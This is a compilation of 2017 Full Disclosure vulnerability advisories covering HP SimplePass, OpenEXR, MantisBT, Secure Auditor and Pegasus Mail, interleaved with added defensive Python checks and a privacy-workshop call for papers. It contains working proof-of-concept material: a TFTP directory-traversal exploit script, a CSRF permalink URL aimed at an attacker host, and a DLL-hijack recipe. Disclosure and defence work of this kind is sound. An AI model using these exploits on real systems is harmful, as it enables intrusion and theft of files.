[FD] HP SimplePass Local Privilege Escalation
# Vulnerability Title: HP SimplePass Local Privilege Escalation
# Advisory Release Date: 05/18/2017
# Credit: Discovered By Rehan Ahmed
# Contact: knight_re...@hotmail.com
# Severity Level: Medium
# Type: Local
# Tested Platform: Windows 8 & 10 x64
# Vendor: HP Inc.
# Vendor Site: http://www.hp.com
# Download Link: http://ftp.hp.com/pub/softpaq/sp64001-64500/sp64339.exe
# Vulnerable Version: HP SimplePass 8.00.49, 8.00.57, 8.01.46
# Vendor Contacted: 04/03/2017
# Vendor Response: 5/18/2017

Summary:
HP SimplePass allows you to safely store logon information for your favorite websites, and use a single method of authentication for your password-protected website accounts. Choose a fingerprint, password or PIN to authenticate your identity. Your computer must have at least one password-protected Windows User Account to use HP SimplePass.
https://support.hp.com/us-en/document/c03653209

# Issue Details: #

HP SimplePass is prone to a local privilege-escalation vulnerability due to insecure file system permissions that have been granted during installation. A local adversary can exploit this issue to gain elevated privileges on the affected system. HP SimplePass installs by default to "C:\Program Files\Hewlett-Packard\SimplePass" with very weak folder permissions granting any user full permission to the contents of the directory and its subfolders. This allows ample opportunity for code execution against any other user running the application. HP SimplePass has few binaries which are typically configured as a service or startup program which makes this particularly easy to take leverage.

## Proof of Concept ##

a) C:\>icacls "C:\Program Files\Hewlett-Packard\SimplePass"

C:\Program Files\Hewlett-Packard\SimplePass Everyone:(F)
                                            Everyone:(OI)(CI)(IO)(F)
                                            BUILTIN\Administrators:(I)(F)
                                            BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
                                            NT AUTHORITY\SYSTEM:(I)(F)
                                            NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
                                            NT AUTHORITY\Authenticated Users:(I)(M)
                                            NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M)
                                            BUILTIN\Users:(I)(RX)
                                            BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)

b) C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" | findstr /i "HP SimplePass"

HP SimplePass Cachedrv Service   Cachedrv server   "C:\Program Files\Hewlett-Packard\SimplePass\cachesrvr.exe"   Auto
HP SimplePass Service            omniserv          C:\Program Files\Hewlett-Packard\SimplePass\OmniServ.exe      Auto

A user can place a malicious DLL/EXE (e.g. OmniServ.exe) file with one of the expected names into that directory and wait until the service is restarted. The service can not be restarted by normal users but an attacker could just reboot the system or wait for the next reboot to happen.

### 3) Mitigation: ###

Change the permission for directory to group other than Administrator on Read/Execute.

Fix: https://support.hp.com/us-en/drivers/selfservice/hp-envy-m7-n100-notebook-pc/8499292/model/8788306

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
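
A defender-side check for the condition this advisory describes, as an added example that is not part of the original post: the Python below parses the icacls output quoted in the advisory, lists the ACEs that give low-privileged groups write-level rights, and reports which of the listed service binaries sit under that folder. The LOW_PRIV and WRITE_RIGHTS sets and all function names are choices made for this example; only allow ACEs, as shown in the advisory, are modelled.

```python
import re
from pathlib import PureWindowsPath

# Groups every ordinary local user belongs to (audit list chosen for this example).
LOW_PRIV = {"everyone", r"nt authority\authenticated users",
            r"nt authority\interactive", r"builtin\users"}
INHERIT_FLAGS = {"I", "OI", "CI", "IO", "NP"}
# icacls rights that let the holder create, overwrite, delete or re-ACL files.
WRITE_RIGHTS = {"F", "M", "W", "GA", "GW", "WD", "AD", "DC", "WDAC", "WO"}
ACE_RE = re.compile(r"^([^:()]+):((?:\([^()]*\))+)$")

# Input taken from the advisory, one ACE per line as icacls prints it.
DIRECTORY = r"C:\Program Files\Hewlett-Packard\SimplePass"
ICACLS_OUTPUT = r"""
C:\Program Files\Hewlett-Packard\SimplePass Everyone:(F)
    Everyone:(OI)(CI)(IO)(F)
    BUILTIN\Administrators:(I)(F)
    BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
    NT AUTHORITY\SYSTEM:(I)(F)
    NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
    NT AUTHORITY\Authenticated Users:(I)(M)
    NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M)
    BUILTIN\Users:(I)(RX)
    BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
"""
SERVICE_PATHS = [
    r'"C:\Program Files\Hewlett-Packard\SimplePass\cachesrvr.exe"',
    r"C:\Program Files\Hewlett-Packard\SimplePass\OmniServ.exe",
]


def parse_aces(directory, icacls_output):
    """Yield (principal, inheritance flags, rights) for each ACE line."""
    for line in icacls_output.splitlines():
        line = line.strip()
        if line.lower().startswith(directory.lower()):
            line = line[len(directory):].strip()    # first line carries the path
        match = ACE_RE.match(line)
        if not match:
            continue                                 # blank or summary line
        groups = re.findall(r"\(([^()]*)\)", match.group(2))
        flags = {g for g in groups if g in INHERIT_FLAGS}
        rights = {r for g in groups if g not in INHERIT_FLAGS for r in g.split(",")}
        yield match.group(1).strip(), flags, rights


def weak_aces(directory, icacls_output):
    """Return ACEs that give a low-privileged group write-level access."""
    findings = []
    for principal, flags, rights in parse_aces(directory, icacls_output):
        risky = sorted(rights & WRITE_RIGHTS)
        if principal.lower() in LOW_PRIV and risky:
            scope = "children only" if "IO" in flags else "this folder"
            findings.append((principal, ",".join(risky), scope))
    return findings


def exposed_services(directory, service_paths, findings):
    """Return service binaries that live under a folder with weak ACEs.

    Paths are expected without arguments, as in the wmic output above.
    """
    if not findings:
        return []
    root = PureWindowsPath(directory)               # compares case-insensitively
    binaries = [PureWindowsPath(p.strip().strip('"')) for p in service_paths]
    return [str(b) for b in binaries if root in b.parents]


if __name__ == "__main__":
    found = weak_aces(DIRECTORY, ICACLS_OUTPUT)
    for principal, rights, scope in found:
        print(f"WEAK  {principal}: {rights} ({scope})")
    for binary in exposed_services(DIRECTORY, SERVICE_PATHS, found):
        print(f"AT RISK  {binary}")
```
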
Re: [FD] [oss-security] Multiple crashes in OpenEXR
> On May 12, 2017, at 1:48 PM, Brandon Perry wrote:
>
>
>> On May 12, 2017, at 1:45 PM, Henri Salo wrote:
>>
>> On Fri, May 12, 2017 at 12:09:30PM -0500, Brandon Perry wrote:
>>> As of this writing, . No CVEs have been requested.
>>
>> Why not?
>
> I’m lazy. I might this weekend.
>

Attached is the email from MITRE regarding the 7 CVE allocations.

--- Begin Message ---
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

The 7 CVE IDs are below. In our web form, the field sizes are unfortunately not large enough for the full Valgrind output; however, we understand that the intention was to send the Valgrind output in the attached ZIP file of the http://marc.info/?l=oss-security&m=149460897719400&w=2 post.

> [Suggested description]
> In OpenEXR 2.2.0,
> an invalid read of size 2 in the hufDecode function in ImfHuf.cpp
> could cause the application to crash.
>
> --
>
> [Additional Information]
> ==25145== Memcheck, a memory error detector
> ==25145== Copyright (C) 2002-2015, and GNU GPL'd, by Julian Seward et al.
> ==25145== Using Valgrind-3.11.0 and LibVEX; rerun with -h for copyright info
> ==25145== Command: /root/openexr/OpenEXR/exr2aces/build/exr2aces id:12,sig:11,src:000328+001154,op:splice,rep:16 /dev/null
> ==25145==
> ==25145== Invalid read of size 2
> ==25145==    at 0x4EDC452: hufDecode (ImfHuf.cpp:898)
> ==25145==    by 0x4EDC452: Imf_2_2::hufUncompress(char const*, int, unsigned short*, int) (ImfHuf.cpp:1101)
> ==25145==    by 0x4EE5680: Imf_2_2::PizCompressor::uncompress(char const*, int, Imath_2_2::Box >, char const*&) (ImfPizCompressor.cpp:576)
> ==25145==    by 0x4EE4E9D: Imf_2_2::PizCompressor::uncompress(char const*, int, int, char const*&) (ImfPizCompressor.cpp:284)
> ==25145==    by 0x4F5F4A3: Imf_2_2::(anonymous namespace)::LineBufferTask::execute() (ImfScanLineInputFile.cpp:540)
> ==25145==    by 0x54587BD: IlmThread_2_2::ThreadPool::addTask(IlmThread_2_2::Task*) (IlmThreadPool.cpp:433)
> ==25145==    by 0x4F58B47: Imf_2_2::ScanLineInputFile::readPixels(int, int) (ImfScanLineInputFile.cpp:1612)
> ==25145==    by 0x4EB603F: Imf_2_2::InputFile::readPixels(int, int) (ImfInputFile.cpp:815)
> ==25145==    by 0x4ED4C42: Imf_2_2::RgbaInputFile::readPixels(int, int) (ImfRgbaFile.cpp:1302)
> ==25145==    by 0x4FB2416: Imf_2_2::AcesInputFile::readPixels(int, int) (ImfAcesFile.cpp:509)
> ==25145==    by 0x40283D: exr2aces (main.cpp:128)
> ==25145==    by 0x40283D: main (main.cpp:220)
> ==25145== Address 0x717c03e is 2 bytes before a block of size 8,356,352 alloc'd
> ==25145==    at 0x4C2E80F: operator new[](unsigned long) (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
> ==25145==    by 0x4EE26EA: Imf_2_2::PizCompressor::PizCompressor(Imf_2_2::Header const&, unsigned long, unsigned long) (ImfPizCompressor.cpp:193)
> ==25145==    by 0x4EE0767: Imf_2_2::newCompressor(Imf_2_2::Compression, unsigned long, Imf_2_2::Header const&) (ImfCompressor.cpp:148)
> == ...
>
> --
>
> [Vulnerability Type]
> Buffer Overflow
>
> --
>
> [Vendor of Product]
> Industrial Light & Magic
>
> --
>
> [Affected Product Code Base]
> OpenEXR - 2.2.0
>
> --
>
> [Affected Component]
> ImfHuf.cpp, hufDecode function
>
> --
>
> [Attack Type]
> Local
>
> --
>
> [Impact Denial of Service]
> true
>
> --
>
> [Impact Information Disclosure]
> true
>
> --
>
> [Attack Vectors]
> Someone must open a crafted
>
> --
>
> [Reference]
> http://www.openwall.com/lists/oss-security/2017/05/12/5
>
> --
>
> [Discoverer]
> Brandon Perry

Use CVE-2017-9110.

> [Suggested description]
> In OpenEXR 2.2.0,
> an invalid write of size 8 in the storeSSE function in
> ImfOptimizedPixelReading.h could cause the application to crash or
> execute arbitrary code.
>
> --
>
> [Additional Information]
> ==1726== Memcheck, a memory error detector
> ==1726== Copyright (C) 2002-2015, and GNU GPL'd, by Julian Seward et al.
> ==1726== Using Valgrind-3.11.0 and LibVEX; rerun with -h for copyright info
> ==1726== Command: /root/openexr/OpenEXR/exr2aces/build/exr2aces id:87,sig:11,src:000562+000300,op:splice,rep:2 /dev/null
> ==1726==
> ==1726== Invalid write of size 8
> ==1726==    at 0x4F5C940: storeSSE (ImfOptimizedPixelReading.h:125)
> ==1726==    by 0x4F5C940: writeToRGBASSETemplate (ImfOptimizedPixelReading.h:166)
> ==1726==    by 0x4F5C940: optimizedWriteToRGBA (ImfOptimizedPixelReading.h:248)
> ==1726==    by 0x4F5C940: Imf_2_2::(anonymous namespace)::LineBufferTaskIIF::execute
[FD] CVE-2017-7620 Mantis Bug Tracker 1.3.10 / v2.3.0 CSRF Permalink Injection
[+] Credits: John Page a.k.a hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MANTIS-BUG-TRACKER-CSRF-PERMALINK-INJECTION.txt
[+] ISR: ApparitionSec

Vendor:
www.mantisbt.org

Product:
Mantis Bug Tracker 1.3.10 / v2.3.0

MantisBT is a popular free web-based bug tracking system. It is written in PHP and works with MySQL, MS SQL, and PostgreSQL databases.

Vulnerability Type:
CSRF Permalink Injection

CVE Reference:
CVE-2017-7620

Security Issue:
Remote attackers can inject arbitrary permalinks into the mantisbt Web Interface if an authenticated user visits a malicious webpage.

Vuln code in "string_api.php" PHP file, under mantis/core/ did not account for supplied backslashes.

Line: 270

# Check for URL's pointing to other domains
if( 0 == $t_type || empty( $t_matches['script'] ) ||
    3 == $t_type && preg_match( '@(?:[^:]*)?:/*@', $t_url ) > 0 ) {
    return ( $p_return_absolute ? $t_path . '/' : '' ) . 'index.php';
}

# Start extracting regex matches
$t_script = $t_matches['script'];
$t_script_path = $t_matches['path'];

Exploit/POC:

http://VICTIM-IP/mantisbt-2.3.0/permalink_page.php?url=\/ATTACKER-IP"; method="POST"> document.forms[0].submit()

OR

http://VICTIM-IP/permalink_page.php?url=\/ATTACKER-IP%2Fmantisbt-2.3.0%2Fsearch.php%3Fproject_id%3D1%26sticky%3Don%26sort%3Dlast_updated%26dir%3DDESC%26hide_status%3D90%26match_type%3D0"; method="POST"> document.forms[0].submit()

Network Access:
Remote

Severity:
Medium

Disclosure Timeline:
Vendor Notification: April 9, 2017
Vendor Release Fix: May 15, 2017
Vendor Disclosed: May 20, 2017
May 20, 2017 : Public Disclosure

[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere.

All content (c).

hyp3rlinx
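
Why a backslash gets past a "does this URL point to another domain" test, as an added Python model that is not MantisBT's code or its fix: a check that relies on the URL parser alone sees no scheme and no host in a value that starts with "\/", while browsers read "\" as "/" in http(s) URLs and treat the same value as scheme-relative. The function names are hypothetical, attacker.example is a placeholder host, and the index.php fallback mirrors the quoted snippet.

```python
from urllib.parse import urlsplit

FALLBACK = "index.php"   # same fallback the quoted string_api.php code returns


def naive_is_local(url):
    """Trust the parser alone: no scheme and no host is taken to mean same-site."""
    parts = urlsplit(url)
    return not parts.scheme and not parts.netloc


def is_local(url):
    """Apply the same test after normalising the value the way a browser reads it."""
    if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in url):
        return False                       # control characters have no place here
    normalised = url.replace("\\", "/")    # browsers read "\" as "/" in http(s) URLs
    if normalised.startswith("//"):
        return False                       # scheme-relative: names another host
    return naive_is_local(normalised)


def sanitize_redirect(url, check=is_local):
    """Return the URL if it passes the check, otherwise the safe fallback."""
    return url if check(url) else FALLBACK


# Constructed inputs for the comparison below.
SAMPLES = [
    "search.php?project_id=1&sticky=on",   # ordinary relative link
    "https://attacker.example/",           # absolute URL
    "//attacker.example/",                 # scheme-relative URL
    "\\/attacker.example/",                # backslash form used in the advisory
    "/\\attacker.example/",                # the mirrored variant
]


def compare(samples=SAMPLES):
    """Return (value, naive verdict, strict verdict) for each sample."""
    return [(s, naive_is_local(s), is_local(s)) for s in samples]


if __name__ == "__main__":
    for value, naive, strict in compare():
        print(f"{value!r:45} naive={naive!s:5} strict={strict}")
```
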
Re: [FD] CVE-2017-9024 Secure Auditor - v3.0 Directory Traversal
*** Added the product description... ***

[+] Credits: John Page aka HYP3RLINX
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/SECURE-AUDITOR-v3.0-DIRECTORY-TRAVERSAL.txt
[+] ISR: ApparitionSec

Vendor:
www.secure-bytes.com

Product:
Secure Auditor - v3.0

Secure Auditor suite is a unified digital risk management solution for conducting automated audits on Windows, Oracle and SQL databases and Cisco devices.

Vulnerability Type:
Directory Traversal

CVE Reference:
CVE-2017-9024

Security Issue:
Secure Bytes Cisco Configuration Manager, as bundled in Secure Bytes Secure Cisco Auditor (SCA) 3.0, has a Directory Traversal issue in its TFTP Server, allowing attackers to read arbitrary files via ../ sequences in a pathname.

Exploit/POC:

import sys,socket

print 'Secure Auditor v3.0 / Cisco Config Manager'
print 'TFTP Directory Traversal Exploit'
print 'Read ../../../../Windows/system.ini POC'
print 'hyp3rlinx'

HOST = raw_input("[IP]> ")
FILE = '../../../../Windows/system.ini'
PORT = 69

PAYLOAD = "\x00\x01"           #TFTP Read
PAYLOAD += FILE+"\x00"         #Read system.ini using directory traversal
PAYLOAD += "netascii\x00"      #TFTP Type

s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto(PAYLOAD, (HOST, PORT))
out = s.recv(1024)
s.close()

print "Victim Data located on : %s " %(HOST)
print out.strip()

Network Access:
Remote

Severity:
High

Disclosure Timeline:
Vendor Notification: May 10, 2017
No replies
May 20, 2017 : Public Disclosure

[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere.

All content (c).

hyp3rlinx
[FD] CVE-2017-9024 Secure Auditor - v3.0 Directory Traversal
[+] Credits: John Page aka HYP3RLINX
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/SECURE-AUDITOR-v3.0-DIRECTORY-TRAVERSAL.txt
[+] ISR: ApparitionSec

Vendor:
www.secure-bytes.com

Product:
Secure Auditor - v3.0

Vulnerability Type:
Directory Traversal

CVE Reference:
CVE-2017-9024

Security Issue:
Secure Bytes Cisco Configuration Manager, as bundled in Secure Bytes Secure Cisco Auditor (SCA) 3.0, has a Directory Traversal issue in its TFTP Server, allowing attackers to read arbitrary files via ../ sequences in a pathname.

Exploit/POC:

import sys,socket

print 'Secure Auditor v3.0 / Cisco Config Manager'
print 'TFTP Directory Traversal Exploit'
print 'Read ../../../../Windows/system.ini POC'
print 'hyp3rlinx'

HOST = raw_input("[IP]> ")
FILE = '../../../../Windows/system.ini'
PORT = 69

PAYLOAD = "\x00\x01"           #TFTP Read
PAYLOAD += FILE+"\x00"         #Read system.ini using directory traversal
PAYLOAD += "netascii\x00"      #TFTP Type

s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto(PAYLOAD, (HOST, PORT))
out = s.recv(1024)
s.close()

print "Victim Data located on : %s " %(HOST)
print out.strip()

Network Access:
Remote

Severity:
High

Disclosure Timeline:
Vendor Notification: May 10, 2017
No replies
May 20, 2017 : Public Disclosure

[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information.
The author prohibits any malicious use of security related information or exploits by the author or elsewhere.

All content (c).

hyp3rlinx
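
The server-side check whose absence CVE-2017-9024 describes, as an added Python example that is not code from the advisory or from the vendor: it parses a TFTP read request (RFC 1350 layout) and maps the requested name into a root directory, answering with an ERROR packet when the name is absolute or contains a ".." component in either separator style. The root C:\TFTP-Root, the file router1.cfg and all function names are assumptions made for this example.

```python
import struct
from pathlib import PureWindowsPath

OP_RRQ, OP_ERROR = 1, 5
ERR_ACCESS_VIOLATION, ERR_ILLEGAL_OP = 2, 4     # RFC 1350 error codes
ALLOWED_MODES = {"netascii", "octet"}
ROOT = r"C:\TFTP-Root"                          # hypothetical served directory


class Reject(Exception):
    """The request must be refused with a TFTP ERROR packet."""
    def __init__(self, code, message):
        super().__init__(message)
        self.code, self.message = code, message


def parse_rrq(packet):
    """Split a read request into (filename, mode): opcode, name NUL, mode NUL."""
    if len(packet) < 4 or struct.unpack("!H", packet[:2])[0] != OP_RRQ:
        raise Reject(ERR_ILLEGAL_OP, "Illegal TFTP operation")
    fields = packet[2:].split(b"\x00")
    if len(fields) < 3 or not fields[0]:
        raise Reject(ERR_ILLEGAL_OP, "Malformed request")
    try:
        name = fields[0].decode("ascii")
        mode = fields[1].decode("ascii").lower()
    except UnicodeDecodeError:
        raise Reject(ERR_ILLEGAL_OP, "Malformed request")
    if mode not in ALLOWED_MODES:
        raise Reject(ERR_ILLEGAL_OP, "Unsupported mode")
    return name, mode


def resolve_in_root(root, requested):
    """Map a client-supplied name to a path under root, or raise Reject."""
    rel = PureWindowsPath(requested)            # splits on both "/" and "\"
    if rel.drive or rel.root:
        raise Reject(ERR_ACCESS_VIOLATION, "Access violation")    # absolute or UNC
    if not rel.parts or ".." in rel.parts:
        raise Reject(ERR_ACCESS_VIOLATION, "Access violation")    # leaves the root
    # A real server should also resolve the final on-disk path (links,
    # junctions) and confirm it is still inside root before opening it.
    return PureWindowsPath(root) / rel


def handle(packet, root=ROOT):
    """Return ("serve", path) or ("error", error_packet) for one datagram."""
    try:
        name, _mode = parse_rrq(packet)
        return "serve", resolve_in_root(root, name)
    except Reject as exc:
        header = struct.pack("!HH", OP_ERROR, exc.code)
        return "error", header + exc.message.encode("ascii") + b"\x00"


# The request bytes the advisory's PoC builds, then two constructed requests.
ADVISORY_RRQ = b"\x00\x01" + b"../../../../Windows/system.ini\x00" + b"netascii\x00"
BACKSLASH_RRQ = b"\x00\x01" + b"..\\..\\Windows\\system.ini\x00" + b"octet\x00"
BENIGN_RRQ = b"\x00\x01" + b"router1.cfg\x00" + b"octet\x00"

if __name__ == "__main__":
    for request in (ADVISORY_RRQ, BACKSLASH_RRQ, BENIGN_RRQ):
        print(handle(request))
```
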
[FD] CVE-2017-9046 Pegasus "winpm-32.exe" v4.72 Mailto: Link Remote Code Execution
[+] Credits: John Page AKA hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/PEGASUS-MAILTO-LINK-REMOTE-CODE-EXECUTION.txt
[+] ISR: APPARITIONSEC

Vendor:
www.pmail.com

Product:
Pegasus "winpm-32.exe" v4.72 build 572

Pegasus Mail:
Pegasus Mail is a free, standards-based electronic mail client suitable for use by single or multiple users on single computers or on local area networks. A proven product, it has served millions of users since it was released in 1990.

Vulnerability Type:
Remote Code Execution

CVE Reference:
CVE-2017-9046

Security Issue:
Pegasus Mail has a DLL Load Flaw that allows arbitrary code execution by clicking an HTML "mailto:" link if a DLL named "ssgp.dll" exists on the victim's Desktop.

Tested successfully using Internet Explorer Web Browser.

e.g.

mailto:n...@victim.com";>Link text

Place "ssgp.dll" on the desktop then visit the webpage in "Internet Explorer", click the mailto: link arbitrary code executed and Pegasus (pmail) is then launched. User needs to have setup PMAIL with "mailto:" link option on install.

Exploit:

1) Set Pegasus as default Email client for opening Emails, and setup PMAIL with "mailto:" link option on install.

2) Compile "ssgp.dll" as DLL using below 'C' code.

#include <windows.h>

//gcc -c ssgp.c
//gcc -shared -o ssgp.dll ssgp.o

BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){
  switch (reason) {
  case DLL_PROCESS_ATTACH:
    MessageBox(NULL, "Code Execution!", "APPARITIONSEC", MB_OK);
    break;
  }
  return 0;
}

3) Place "ssgp.dll" on Desktop

4) Create an HTML file with following in the web server root directory.

mailto:n...@victim.com";>Pegasus Exploit POC

5) Open webpage in InternetExplorer Web Browser and click malicious mailto: link.

Our code gets executed...

Network Access:
Remote

Severity:
High

Disclosure Timeline:
Vendor Notification: October 8, 2016
Vendor supposedly fixed: January 21, 2016
May 19, 2017 : Public Disclosure

[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere.

All content (c).

hyp3rlinx
[FD] CFP - WPES - 2017 Workshop on Privacy in the Electronic Society
CALL FOR PAPERS

2017 Workshop on Privacy in the Electronic Society (WPES 2017)
Dallas, Texas, USA - October 30, 2017
https://cs.pitt.edu/wpes2017

The need for privacy-aware policies, regulations, and techniques has been widely recognized. This workshop discusses the problems of privacy in the global interconnected societies and possible solutions. The 2017 Workshop, held in conjunction with the ACM CCS conference, is the sixteenth in a yearly forum for papers on all the different aspects of privacy in today's electronic society.

The workshop seeks submissions from academia and industry presenting novel research on all theoretical and practical aspects of electronic privacy, as well as experimental studies of fielded systems. We encourage submissions from other communities such as law and business that present these communities' perspectives on technological issues. Topics of interest include, but are not limited to:

- anonymization and transparency
- crowdsourcing for privacy and security
- data correlation and leakage attacks
- data security and privacy
- data and computations integrity in emerging scenarios
- electronic communication privacy
- economics of privacy
- information dissemination control
- models, languages, and techniques for big data protection
- personally identifiable information
- privacy-aware access control
- privacy and anonymity on the web
- privacy in biometric systems
- privacy in cloud and grid systems
- privacy and confidentiality management
- privacy and data mining
- privacy in the Internet of Things
- privacy in the digital business
- privacy in the electronic records
- privacy enhancing technologies
- privacy and human rights
- privacy in health care and public administration
- privacy metrics
- privacy in mobile systems
- privacy in outsourced scenarios
- privacy policies
- privacy vs. security
- privacy of provenance data
- privacy in social networks
- privacy threats
- privacy and virtual identity
- user profiling
- wireless privacy

PAPER SUBMISSIONS

Submitted papers must not substantially overlap papers that have been published or that are simultaneously submitted to a journal or a conference with proceedings. Regular submissions should be at most 10 pages in the ACM double-column format (http://www.acm.org/sigs/publications/proceedings-templates) including bibliography, but excluding well-marked appendices, and at most 12 pages total. Committee members are not required to read the appendices, and so the paper should be intelligible without them. Submissions should not be anonymized.

The workshop will also consider short submissions of up to 4 pages for results that are preliminary or that simply require few pages to describe. Authors of regular submitted papers will indicate at the time of submission whether they would like their paper to also be considered for publication as a short paper (4 proceedings pages).

Submissions are to be made to the submission web site at https://easychair.org/conferences/?conf=wpes2017. You will be requested to upload the file of your paper (in PDF format only). Submissions not meeting these guidelines risk rejection without consideration of their merits. Papers must be received by the deadline of **August 4, 2016** to be considered. Notification of acceptance or rejection will be sent to authors by September 8, 2017. The camera ready must be prepared by September 17, 2017 (firm).

Proceedings of the workshop will be published by ACM on a CD, available to the workshop attendees. Papers will be included in the ACM Digital Library, with a specific ISBN. Each accepted paper must be presented by an author, who will have to be registered by the early-bird registration deadline.

IMPORTANT DATES

Paper Submission due: August 4, 2017 (11:59 PM American Samoa Time)
Notification to authors: September 8, 2017 (11:59 PM American Samoa Time)
Camera ready due: September 17, 2017

PROGRAM CHAIR

Adam J. Lee, University of Pittsburgh, USA

PUBLICITY CHAIR

William C. Garrison III, University of Pittsburgh, USA

PROGRAM COMMITTEE

TBD

STEERING COMMITTEE

Sabrina De Capitani di Vimercati, Università degli Studi di Milano, Italy
Sushil Jajodia, George Mason University, USA
Pierangela Samarati (Chair), Università degli Studi di Milano, Italy
Paul Syverson, Naval Research Laboratory, USA

Submissions are to be made at: https://easychair.org/conferences/?conf=wpes2017

This call for papers and additional information about the conference can be found at https://cs.pitt.edu/wpes2017